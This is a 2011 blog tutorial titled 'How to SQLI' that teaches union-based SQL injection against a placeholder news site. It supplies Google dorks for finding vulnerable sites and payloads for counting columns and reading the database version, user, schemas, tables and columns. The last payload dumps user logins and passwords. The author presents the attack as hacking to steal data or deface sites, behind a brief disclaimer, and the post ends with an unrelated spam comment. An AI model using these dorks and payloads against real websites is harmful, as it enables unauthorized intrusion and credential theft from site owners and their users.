Monday, May 30, 2011

How to SQLI

This is for educational purposes only. I am not responsible for your actions based on the content provided.

How to SQLI

Hey everyone! I'm Epic, and today I will be teaching you how to SQLI, I will do this in a question-answer format, I will start with a broad question at the beginning of every step, and clarify the answer beneath it, I think this is the simplest, easiest way to teach you. I would like to state a few things: I have only attempted SQLI on websites I own and create, I do not recommend or encourage you use this to "hack" websites that are not your own property and creation. This thread is meant for research and education purposes, not to supply or support hackers. I do not condone or support illegal hacking. I am not responsible for consequences should you partake in illegal hacking. I am not responsible for anyone who interprets this thread incorrectly and uses it for illegal hacking.

Now that we've gotten that out of the way, lets begin!

SOME THINGS TO REMEMBER WHILE READING THIS GUIDE
This is not the easiest method, there is an easier, less-involved method beneath, though some find this "completely on your own" method more satisfying. Anything within CODE tags represents the doing part of a step, the part where you will actually do/enter something (you may have to click enter/return to reload your browser). The text and pictures help to keep you on track and explain what's going on.

What is SQLI?
SQLI stands for SQL Injection. What's SQL? It stands for Structured Query Language. Structured Query Language is a database computer language designed for managing data in relational database management systems (RDBMS). Structured Query Language Injection is when you "inject" (hack) into a website, you can steal data, or you can upload your own data (some might call this defacing a website).

Okay, how do I start?
Well you start by finding a "vuln host" as many tutorials describe it. Basically, you need to find a vulnerable website that will allow you to SQLI. Not all websites are vulnerable using SQLI, while all websites are at risk to some form of hacking, it may be to secure and well coded to SQLI.

First off, you'll need "dorks". Here are a few dorks that you can use (although there's many more):
Code:
inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=
Here is a list of more dorks.

You saying I'm a dork? - Now what?

Let's say you're on this website:
Code:
http://site.com/news/view.php?id=828
Add a single quotation mark (') before or after the numbers and it should show an error - assuming its vulnerable for SQLI:


How do I find the right number of columns?
You need to find the right amount of columns by using the "order by" command:
Code:
http://site.com/news/view.php?id=828 order by 1-- (page loads normal)
http://site.com/news/view.php?id=828 order by 2-- (page loads normal)
http://site.com/news/view.php?id=828 order by 3-- (page loads normal)
http://site.com/news/view.php?id=828 order by 4-- (page loads normal)
http://site.com/news/view.php?id=828 order by 5-- (page loads normal)
http://site.com/news/view.php?id=828 order by 6-- (page loads normal)
http://site.com/news/view.php?id=828 order by 7-- (page loads normal)
http://site.com/news/view.php?id=828 order by 8-- (page loads normal)
http://site.com/news/view.php?id=828 order by 9-- (error)
If this is the case, if there error is on the ninth, it means the page has 8 columns, this is typical, but should not be expected, you will find that different websites will have different numbers of columns.

Now we will use the "Union Select" command:
Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--
Don't forget the two dashes (--) after the numbers. The numbers (in this scenario 1- is reflective on the number of columns the website has, so if your website only had two columns you'd enter 1,2.

This will make the website show some numbers on the screen:


If so, the website is definitely SQLI vulnerable, and ready to hack.

How do I get mySQL and Current User?

Now we need to know the MySQL version, if its over 5 (hopefully it is) we'll be able to hack it. If its under 5 I STRONGLY urge you to find a different website, it will be difficult for beginners because when its under 5 you'll have to randomly guess the tables and columns.

Code:
http://site.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--
You should now be at this point:


To get the current user, enter this:

Code:
http://site.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--
This will change the website display to:


How do I get the Databases?

Now we wanna find the databases and the Current database.
Here is the syntax for all databases:

Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--
Your display should now appear as:



Now we would like to now what is the current database, it's pretty obvious in this case but useful sometimes.

Syntax for current database:

Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8
If you're following along correctly, you should now get:




How do I get the tables?

Now we want to know the tables in the database and for this we will continue using "union select".

Here is the code:

Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--
Hopefully you have reached this point:


We now know that the table (based on the data we have received) that passwords should be stored in are called "users" or anything that looks like that, write it down and move on.

How do I get columns?

Now we want to know the columns.

Here is the code:

Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--
We're now at this point:


How do I finally get the account info? How do I dump user/pass?

Now you want to dump logins and passwords from bpusers:

Here is the code for that:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--


(NOTE: 0x3a will make a : between logins and passwords.)


Congratulations, you should have successfully completed an SQLI attack.




1 comment:

  1. Los Angeles …Look at the site…News about residential income/rental property in Los Angeles.
    Los Angeles Housing Dept

    ReplyDelete